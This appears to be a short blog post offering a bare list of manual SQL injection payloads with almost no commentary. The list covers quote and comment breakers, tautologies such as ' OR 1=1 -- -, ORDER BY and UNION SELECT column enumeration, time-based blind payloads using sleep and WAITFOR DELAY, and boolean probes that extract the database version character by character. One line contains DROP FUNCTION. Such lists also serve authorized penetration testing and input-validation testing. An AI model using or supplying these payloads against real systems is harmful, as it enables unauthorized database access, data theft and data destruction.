Home Security Sqli_sql_injection手动payload
Post
Cancel

Security Sqli_sql_injection手动payload

1.
'
''
`
``
,
"
""
/
//
\
\\
;
' or "
-- or #
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
' OR '' = '
'='
'LIKE'
'=0--+
 OR 1=1
' OR 'x'='x
' AND id IS NULL; --
'''''''''''''UNION SELECT '2
%00
/*…*/
+		addition, concatenate (or space in url)
||		(double pipe) concatenate
%		wildcard attribute indicator

@variable	local variable
@@variable	global variable


# Numeric
AND 1
AND 0
AND true
AND false
1-false
1-true
1*56
-2


1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+

1' ORDER BY 1,2--+
1' ORDER BY 1,2,3--+

1' GROUP BY 1,2,--+
1' GROUP BY 1,2,3--+
' GROUP BY columnnames having 1=1 --


-1' UNION SELECT 1,2,3--+
' UNION SELECT sum(columnname ) from tablename --


-1 UNION SELECT 1 INTO @,@
-1 UNION SELECT 1 INTO @,@,@

1 AND (SELECT * FROM Users) = 1

' AND MID(VERSION(),1,1) = '5';

' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --


Finding the table name


Time-Based:
,(select * from (select(sleep(10)))a)
%2c(select%20*%20from%20(select(sleep(10)))a)
';WAITFOR DELAY '0:0:30'--

Comments:

#	    Hash comment
/*  	C-style comment
-- -	SQL comment
;%00	Nullbyte
`	    Backtick
2.
 OR 1=1
 OR 1=0
 OR x=x
 OR x=y
 OR 1=1#
 OR 1=0#
 OR x=x#
 OR x=y#
 OR 1=1--
 OR 1=0--
 OR x=x--
 OR x=y--
 OR 3409=3409 AND ('pytW' LIKE 'pytW
 OR 3409=3409 AND ('pytW' LIKE 'pytY
 HAVING 1=1
 HAVING 1=0
 HAVING 1=1#
 HAVING 1=0#
 HAVING 1=1--
 HAVING 1=0--
 AND 1=1
 AND 1=0
 AND 1=1--
 AND 1=0--
 AND 1=1#
 AND 1=0#
 AND 1=1 AND '%'='
 AND 1=0 AND '%'='
 AND 1083=1083 AND (1427=1427
 AND 7506=9091 AND (5913=5913
 AND 1083=1083 AND ('1427=1427
 AND 7506=9091 AND ('5913=5913
 AND 7300=7300 AND 'pKlZ'='pKlZ
 AND 7300=7300 AND 'pKlZ'='pKlY
 AND 7300=7300 AND ('pKlZ'='pKlZ
 AND 7300=7300 AND ('pKlZ'='pKlY
 AS INJECTX WHERE 1=1 AND 1=1
 AS INJECTX WHERE 1=1 AND 1=0
 AS INJECTX WHERE 1=1 AND 1=1#
 AS INJECTX WHERE 1=1 AND 1=0#
 AS INJECTX WHERE 1=1 AND 1=1--
 AS INJECTX WHERE 1=1 AND 1=0--
 WHERE 1=1 AND 1=1
 WHERE 1=1 AND 1=0
 WHERE 1=1 AND 1=1#
 WHERE 1=1 AND 1=0#
 WHERE 1=1 AND 1=1--
 WHERE 1=1 AND 1=0--
 ORDER BY 1--
 ORDER BY 2--
 ORDER BY 3--
 ORDER BY 4--
 ORDER BY 5--
 ORDER BY 6--
 ORDER BY 7--
 ORDER BY 8--
 ORDER BY 9--
 ORDER BY 10--
 ORDER BY 11--
 ORDER BY 12--
 ORDER BY 13--
 ORDER BY 14--
 ORDER BY 15--
 ORDER BY 16--
 ORDER BY 17--
 ORDER BY 18--
 ORDER BY 19--
 ORDER BY 20--
 ORDER BY 21--
 ORDER BY 22--
 ORDER BY 23--
 ORDER BY 24--
 ORDER BY 25--
 ORDER BY 26--
 ORDER BY 27--
 ORDER BY 28--
 ORDER BY 29--
 ORDER BY 30--
 ORDER BY 31337--
 ORDER BY 1#
 ORDER BY 2#
 ORDER BY 3#
 ORDER BY 4#
 ORDER BY 5#
 ORDER BY 6#
 ORDER BY 7#
 ORDER BY 8#
 ORDER BY 9#
 ORDER BY 10#
 ORDER BY 11#
 ORDER BY 12#
 ORDER BY 13#
 ORDER BY 14#
 ORDER BY 15#
 ORDER BY 16#
 ORDER BY 17#
 ORDER BY 18#
 ORDER BY 19#
 ORDER BY 20#
 ORDER BY 21#
 ORDER BY 22#
 ORDER BY 23#
 ORDER BY 24#
 ORDER BY 25#
 ORDER BY 26#
 ORDER BY 27#
 ORDER BY 28#
 ORDER BY 29#
 ORDER BY 30#
 ORDER BY 31337#
 ORDER BY 1
 ORDER BY 2
 ORDER BY 3
 ORDER BY 4
 ORDER BY 5
 ORDER BY 6
 ORDER BY 7
 ORDER BY 8
 ORDER BY 9
 ORDER BY 10
 ORDER BY 11
 ORDER BY 12
 ORDER BY 13
 ORDER BY 14
 ORDER BY 15
 ORDER BY 16
 ORDER BY 17
 ORDER BY 18
 ORDER BY 19
 ORDER BY 20
 ORDER BY 21
 ORDER BY 22
 ORDER BY 23
 ORDER BY 24
 ORDER BY 25
 ORDER BY 26
 ORDER BY 27
 ORDER BY 28
 ORDER BY 29
 ORDER BY 30
 ORDER BY 31337
 RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
 RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--
IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--
%' AND 8310=8310 AND '%'='
%' AND 8310=8311 AND '%'='
 and (select substring(@@version,1,1))='X'
 and (select substring(@@version,1,1))='M'
 and (select substring(@@version,2,1))='i'
 and (select substring(@@version,2,1))='y'
 and (select substring(@@version,3,1))='c'
 and (select substring(@@version,3,1))='S'
 and (select substring(@@version,3,1))='X'
This post is licensed under CC BY 4.0 by the author.